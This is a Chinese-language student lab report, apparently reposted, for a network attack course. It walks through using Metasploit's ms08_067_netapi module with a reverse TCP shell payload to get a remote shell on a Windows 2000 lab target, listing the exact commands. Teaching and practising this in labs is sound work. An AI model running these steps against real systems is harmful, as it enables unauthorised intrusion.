2017-2018-2 20179205《網絡攻防技術與實踐》Windows攻擊實驗


Windows攻擊實驗

實驗描述:

使用Metaspoit攻擊MS08-067,提交正確得到遠程shell過程的截圖(不少於五張)。

MS08-067漏洞介紹

  MS08-067漏洞的全稱為“Windows Server服務RPC請求緩沖區溢出漏洞”,如果用戶在受影響的系統上收到特制的 RPC 請求,則該漏洞可能允許遠程執行代碼。在 Microsoft Windows 2000Windows XP 和 Windows Server 2003 系統上,攻擊者可能未經身份驗證即可利用此漏洞運行任意代碼,此漏洞可用於進行蠕蟲攻擊,目前已經有利用該漏洞的蠕蟲病毒。

實驗工具

本次實驗使用的攻擊機是kali,靶機是Win2kServer

攻擊機:192.168.92.147
靶機:192.168.92.148

實驗步驟:

1.首先攻擊機和靶機互ping,在kali終端開啟msfconsole

2.查找是否存在ms08_067漏洞,查看返回信息,會顯示出找到的滲透模塊

3.輸入命令use exploit/windows/smb/ms08_067_netapi,進入利用該漏洞模塊。接下來可輸入一些命令來顯示一些信息,如:

輸入show payloads會顯示出有效的攻擊載荷,比如shell_reverse_tcp

使用命令set payload generic/shell_reverse_tcp設置攻擊有效載荷

輸入show targets會顯示出可以被攻擊的靶機的操作系統型號

4.輸入show options顯示我們需要在攻擊前需要設置的數據

5.設置攻擊機和靶機地址,並使用命令show options再次查看payload狀態

輸入命令set LHOST + 攻擊機IP,即set LHOST 192.168.92.147;
輸入命令set RHOST + 靶機IP,即set RHOST 192.168.92.148;

6.輸入命令exploit開始攻擊,下圖為正常攻擊成功結果

7.在攻擊機和靶機中分別查看IP地址,輸入ipconfig/all,發現結果一致

8.輸入“netstat -a”命令,可以查看靶機開啟了哪些端口

9.輸入“netstat -n”命令, 查看靶機端口的網絡連接情況


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM